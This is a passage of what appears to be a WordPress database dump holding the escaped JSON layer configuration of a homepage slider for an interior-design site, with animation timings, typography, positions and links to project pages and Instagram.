To\",\"frameLength\":1200}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":1000},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontFamily\":\"Manrope\",\"fontSize\":{\"d\":{\"v\":\"80px\",\"e\":true},\"n\":{\"v\":\"80px\",\"e\":true},\"t\":{\"v\":\"70px\",\"e\":true},\"m\":{\"v\":\"48px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\"},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"v\":\"0px\",\"e\":true},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"lineHeight\":{\"d\":{\"v\":\"92px\",\"e\":true},\"n\":{\"v\":\"92px\",\"e\":true},\"t\":{\"v\":\"82px\",\"e\":true},\"m\":{\"v\":\"60px\",\"e\":true}},\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"type\":\"text\"},\"1\":{\"text\":\"View Projects Residential\",\"alias\":\"Button\",\"uid\":1,\"toggle\":{\"text\":\"\"},\"size\":{\"minWidth\":{\"d\":{\"e\":true}},\"minHeight\":{\"d\":{\"v\":\"0px\",\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"35px\",\"e\":true},\"n\":{\"v\":\"29px\"},\"t\":{\"v\":\"35px\",\"e\":true},\"m\":{\"v\":\"36px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"210px\",\"e\":true},\"n\":{\"v\":\"200px\",\"e\":true},\"t\":{\"v\":\"100px\",\"e\":true},\"m\":{\"v\":\"90px\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":10},\"group\":{\"groupOrder\":10},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"rotationY\":\"360deg\"},\"timeline\":{\"endWithSlide\":false,\"alias\":\"Anim From\"}},\"frame_1\":{\"timeline\":{\"ease\":\"back.out\",\"speed\":\"2000\",\"start\":1500,\"endWithSlide\":false,\"alias\":\"Anim To\",\"frameLength\":2000}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":1500},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"v\":\"#000000\"},\"n\":{\"v\":\"#000000\"},\"t\":{\"v\":\"#000000\"},\"m\":{\"v\":\"#000000\"}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[18,40,18,40],\"e\":true},\"n\":{\"v\":[18,40,18,40],\"e\":true},\"t\":{\"v\":[18,40,18,40],\"e\":true},\"m\":{\"v\":[18,40,18,40],\"e\":true}},\"fontFamily\":\"Manrope\",\"fontSize\":{\"d\":{\"v\":\"12px\",\"e\":true},\"n\":{\"v\":\"12px\",\"e\":true},\"t\":{\"v\":\"12px\",\"e\":true},\"m\":{\"v\":\"12px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\"},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"v\":\"1px\",\"e\":true},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"lineHeight\":{\"d\":{\"v\":\"12px\",\"e\":true},\"n\":{\"v\":\"12px\",\"e\":true},\"t\":{\"v\":\"12px\",\"e\":true},\"m\":{\"v\":\"12px\",\"e\":true}},\"backgroundColor\":\"rgba(255,255,255,1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"textTransform\":\"uppercase\",\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"usehover\":\"false\",\"backgroundColor\":\"#e3b25a\",\"gradientStyle\":\"sliding\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"speed\":\"500ms\",\"ease\":\"default\",\"copied\":true},\"actions\":{\"action\":[{\"action\":\"link\",\"tooltip_event\":\"click\",\"link_help_in\":\"keep\",\"link_open_in\":\"_self\",\"link_follow\":\"follow\",\"link_type\":\"a\",\"image_link\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/residential\\/\"}],\"inactive_actions\":[]},\"runtime\":{\"internalClass\":\"rev-btn\"},\"type\":\"button\"},\"2\":{\"text\":\"<span class=ova-share-text>Share<\\/span>\",\"alias\":\"Share\",\"uid\":2,\"toggle\":{\"text\":\"\"},\"size\":{\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"40px\",\"e\":true},\"n\":{\"v\":\"34px\"},\"t\":{\"v\":\"25px\"},\"m\":{\"v\":\"15px\"}},\"y\":{\"d\":{\"v\":\"159px\",\"e\":true},\"n\":{\"v\":\"135px\"},\"t\":{\"v\":\"102px\"},\"m\":{\"v\":\"62px\"}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":11},\"behavior\":{\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":11},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"-50\"},\"n\":{\"v\":\"-42\"},\"t\":{\"v\":\"-31\"},\"m\":{\"v\":\"-19\"}}},\"timeline\":{\"endWithSlide\":false,\"alias\":\"Anim From\"}},\"frame_1\":{\"timeline\":{\"speed\":1000,\"start\":2500,\"endWithSlide\":false,\"alias\":\"Anim To\",\"frameLength\":1000}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":2500},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontFamily\":\"Manrope\",\"fontSize\":{\"d\":{\"v\":\"12px\",\"e\":true},\"n\":{\"v\":\"10px\"},\"t\":{\"v\":\"7px\"},\"m\":{\"v\":\"4px\"}},\"fontWeight\":{\"d\":{\"v\":\"500\",\"e\":true},\"n\":{\"v\":\"500\"},\"t\":{\"v\":\"500\"},\"m\":{\"v\":\"500\"}},\"letterSpacing\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"2px\"},\"t\":{\"v\":\"1px\"},\"m\":{\"v\":\"0px\"}},\"lineHeight\":{\"d\":{\"v\":\"12px\",\"e\":true},\"n\":{\"v\":\"10px\"},\"t\":{\"v\":\"7px\"},\"m\":{\"v\":\"6px\"}},\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"rotationX\":\"0deg\",\"rotationY\":\"0deg\",\"rotationZ\":\"0deg\",\"textTransform\":\"uppercase\",\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"visibility\":{\"m\":false,\"n\":false,\"t\":false,\"hideunder\":true},\"type\":\"text\"},\"6\":{\"text\":\"\",\"alias\":\"Copy  social-icon\",\"uid\":6,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"120px\",\"e\":true},\"n\":{\"v\":\"102px\"},\"t\":{\"v\":\"77px\"},\"m\":{\"v\":\"47px\"}},\"height\":{\"d\":{\"v\":\"300px\",\"e\":true},\"n\":{\"v\":\"256px\"},\"t\":{\"v\":\"194px\"},\"m\":{\"v\":\"119px\"}},\"originalWidth\":\"300px\",\"originalHeight\":\"180px\",\"aspectRatio\":{\"d\":{\"v\":1.6666666666666667},\"n\":{\"v\":1.6666666666666667},\"t\":{\"v\":1.6666666666666667},\"m\":{\"v\":1.6666666666666667}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"28px\",\"e\":true},\"n\":{\"v\":\"23px\"},\"t\":{\"v\":\"17px\"},\"m\":{\"v\":\"10px\"}},\"y\":{\"d\":{\"v\":\"290px\",\"e\":true},\"n\":{\"v\":\"247px\"},\"t\":{\"v\":\"187px\"},\"m\":{\"v\":\"115px\"}},\"zIndex\":16},\"behavior\":{\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":0},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"-50\"},\"n\":{\"v\":\"-42\"},\"t\":{\"v\":\"-31\"},\"m\":{\"v\":\"-19\"}}},\"timeline\":{\"endWithSlide\":false,\"alias\":\"Anim From\"}},\"frame_1\":{\"timeline\":{\"speed\":1000,\"start\":2500,\"endWithSlide\":false,\"alias\":\"Anim To\",\"frameLength\":1000}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":2500},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"n\":{\"v\":\"17\"},\"t\":{\"v\":\"12\"},\"m\":{\"v\":\"7\"}},\"lineHeight\":{\"n\":{\"v\":\"21\"},\"t\":{\"v\":\"15\"},\"m\":{\"v\":\"9\"}},\"backgroundColor\":\"rgba(255, 255, 255, 0)\",\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"visibility\":{\"m\":false,\"n\":false,\"t\":false,\"hideunder\":true},\"type\":\"group\"},\"13\":{\"text\":\"<i class=\\\"fa-instagram\\\"><\\/i>\",\"alias\":\"Copy  instagram\",\"uid\":13,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"37px\"},\"n\":{\"v\":\"31px\"},\"t\":{\"v\":\"23px\"},\"m\":{\"v\":\"14px\"}},\"height\":{\"d\":{\"v\":\"37px\"},\"n\":{\"v\":\"31px\"},\"t\":{\"v\":\"23px\"},\"m\":{\"v\":\"14px\"}},\"minWidth\":{\"d\":{\"v\":\"37px\",\"e\":true}},\"minHeight\":{\"d\":{\"v\":\"37px\",\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"110px\",\"e\":true},\"n\":{\"v\":\"93px\"},\"t\":{\"v\":\"70px\"},\"m\":{\"v\":\"43px\"}},\"horizontal\":{\"d\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true}},\"zIndex\":14},\"behavior\":{\"baseAlign\":\"slide\"},\"group\":{\"puid\":6,\"groupOrder\":14},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"transform\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"n\":{\"v\":\"17\"},\"t\":{\"v\":\"12\"},\"m\":{\"v\":\"7\"}},\"lineHeight\":{\"d\":{\"v\":\"37\"},\"n\":{\"v\":\"31\"},\"t\":{\"v\":\"23\"},\"m\":{\"v\":\"14\"}},\"textAlign\":{\"d\":{\"v\":\"center\"},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"backgroundColor\":\"rgba(255, 255, 255, 0)\",\"borderRadius\":{\"v\":[\"50%\",\"50%\",\"50%\",\"50%\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"textTransform\":\"uppercase\",\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"usehover\":\"true\",\"color\":\"#e3b25a\",\"backgroundColor\":\"rgba(255, 255, 255, 0)\",\"borderRadius\":{\"v\":[\"50%\",\"50%\",\"50%\",\"50%\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"copied\":true},\"actions\":{\"action\":[{\"action\":\"link\",\"tooltip_event\":\"click\",\"link_help_in\":\"keep\",\"link_open_in\":\"_blank\",\"link_follow\":\"follow\",\"link_type\":\"a\",\"image_link\":\"https:\\/\\/www.instagram.com\\/bauhausliving\\/\"}],\"inactive_actions\":[]},\"type\":\"button\"},\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":7},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":7},\"text\":\"\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":6},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":6},\"text\":\"\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":5},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":5},\"text\":\"\"}}','{\"version\":\"6.5.25\"}'),(2,1,2,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bg-revslider-home1-02.jpg\",\"imageId\":1709,\"imageLib\":\"medialibrary\",\"imageWidth\":1920,\"imageHeight\":820,\"imageRatio\":2.341463414634146},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"attributes\":{\"alt\":\"Architecture & Interior\"},\"slideChange\":{\"speed\":\"900ms\",\"f\":\"random\",\"d\":\"20\",\"in\":{\"o\":0,\"r\":\"{-45,45}\",\"sx\":0,\"sy\":0,\"row\":5,\"col\":5},\"out\":{\"a\":false},\"title\":\"*rotate_left* Scale & Fade\",\"main\":\"boxes\",\"group\":\"rotation\",\"preset\":\"boxrandomrotate\"}}','{\"0\":{\"text\":\"Menuju Interior \\n<span class=\\\"ova-stroke-text\\\" >Yang Menginspirasi<\\/span>\",\"alias\":\"Title\",\"uid\":0,\"htmltag\":\"h1\",\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"804px\",\"e\":true},\"n\":{\"v\":\"804px\",\"e\":true},\"t\":{\"v\":\"90%\",\"e\":true},\"m\":{\"v\":\"90%\",\"e\":true}},\"height\":{\"d\":{\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"30px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"21px\",\"e\":true},\"n\":{\"v\":\"20px\",\"e\":true},\"t\":{\"v\":\"50px\",\"e\":true},\"m\":{\"v\":\"50px\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\"}},\"zIndex\":8},\"group\":{\"groupOrder\":8},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"175%\"},\"n\":{\"v\":\"175%\"},\"t\":{\"v\":\"175%\"},\"m\":{\"v\":\"175%\"}},\"opacity\":1},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}}},\"timeline\":{\"endWithSlide\":false,\"alias\":\"Anim From\"}},\"frame_1\":{\"mask\":{\"use\":true},\"timeline\":{\"ease\":\"power3.out\",\"speed\":\"1200\",\"start\":1000,\"endWithSlide\":false,\"alias\":\"Anim To\",\"frameLength\":1200}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":1000},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontFamily\":\"Manrope\",\"fontSize\":{\"d\":{\"v\":\"80px\",\"e\":true},\"n\":{\"v\":\"80px\",\"e\":true},\"t\":{\"v\":\"70px\",\"e\":true},\"m\":{\"v\":\"48px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\"},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"v\":\"0px\",\"e\":true},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"lineHeight\":{\"d\":{\"v\":\"92px\",\"e\":true},\"n\":{\"v\":\"92px\",\"e\":true},\"t\":{\"v\":\"82px\",\"e\":true},\"m\":{\"v\":\"60px\",\"e\":true}},\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"type\":\"text\"},\"1\":{\"text\":\"View Projects Commercial\",\"alias\":\"Button\",\"uid\":1,\"toggle\":{\"text\":\"\"},\"size\":{\"minWidth\":{\"d\":{\"e\":true}},\"minHeight\":{\"d\":{\"v\":\"0px\",\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"35px\",\"e\":true},\"n\":{\"v\":\"29px\"},\"t\":{\"v\":\"35px\",\"e\":true},\"m\":{\"v\":\"36px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"210px\",\"e\":true},\"n\":{\"v\":\"200px\",\"e\":true},\"t\":{\"v\":\"100px\",\"e\":true},\"m\":{\"v\":\"90px\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":9},\"group\":{\"groupOrder\":9},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"rotationY\":\"360deg\"},\"timeline\":{\"endWithSlide\":false,\"alias\":\"Anim From\"}},\"frame_1\":{\"timeline\":{\"ease\":\"back.out\",\"speed\":\"2000\",\"start\":1500,\"endWithSlide\":false,\"alias\":\"Anim To\",\"frameLength\":2000}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":1500},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"v\":\"#000000\"},\"n\":{\"v\":\"#000000\"},\"t\":{\"v\":\"#000000\"},\"m\":{\"v\":\"#000000\"}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[18,40,18,40],\"e\":true},\"n\":{\"v\":[18,40,18,40],\"e\":true},\"t\":{\"v\":[18,40,18,40],\"e\":true},\"m\":{\"v\":[18,40,18,40],\"e\":true}},\"fontFamily\":\"Manrope\",\"fontSize\":{\"d\":{\"v\":\"12px\",\"e\":true},\"n\":{\"v\":\"12px\",\"e\":true},\"t\":{\"v\":\"12px\",\"e\":true},\"m\":{\"v\":\"12px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\"},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"v\":\"1px\",\"e\":true},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"lineHeight\":{\"d\":{\"v\":\"12px\",\"e\":true},\"n\":{\"v\":\"12px\",\"e\":true},\"t\":{\"v\":\"12px\",\"e\":true},\"m\":{\"v\":\"12px\",\"e\":true}},\"backgroundColor\":\"rgba(255,255,255,1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"textTransform\":\"uppercase\",\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"usehover\":\"false\",\"backgroundColor\":\"#e3b25a\",\"gradientStyle\":\"sliding\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"speed\":\"500ms\",\"ease\":\"default\",\"copied\":true},\"actions\":{\"action\":[{\"action\":\"link\",\"tooltip_event\":\"click\",\"link_help_in\":\"keep\",\"link_open_in\":\"_self\",\"link_follow\":\"follow\",\"link_type\":\"a\",\"image_link\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/commercial\\/\"}],\"inactive_actions\":[]},\"runtime\":{\"internalClass\":\"rev-btn\"},\"type\":\"button\"},\"2\":{\"text\":\"<span class=ova-share-text>Share<\\/span>\",\"alias\":\"Share\",\"uid\":2,\"toggle\":{\"text\":\"\"},\"size\":{\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"40px\",\"e\":true},\"n\":{\"v\":\"34px\"},\"t\":{\"v\":\"25px\"},\"m\":{\"v\":\"15px\"}},\"y\":{\"d\":{\"v\":\"159px\",\"e\":true},\"n\":{\"v\":\"135px\"},\"t\":{\"v\":\"102px\"},\"m\":{\"v\":\"62px\"}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":10},\"behavior\":{\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":10},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"-50\"},\"n\":{\"v\":\"-42\"},\"t\":{\"v\":\"-31\"},\"m\":{\"v\":\"-19\"}}},\"timeline\":{\"endWithSlide\":false,\"alias\":\"Anim From\"}},\"frame_1\":{\"timeline\":{\"speed\":1000,\"start\":2500,\"endWithSlide\":false,\"alias\":\"Anim To\",\"frameLength\":1000}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":2500},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontFamily\":\"Manrope\",\"fontSize\":{\"d\":{\"v\":\"12px\",\"e\":true},\"n\":{\"v\":\"10px\"},\"t\":{\"v\":\"7px\"},\"m\":{\"v\":\"4px\"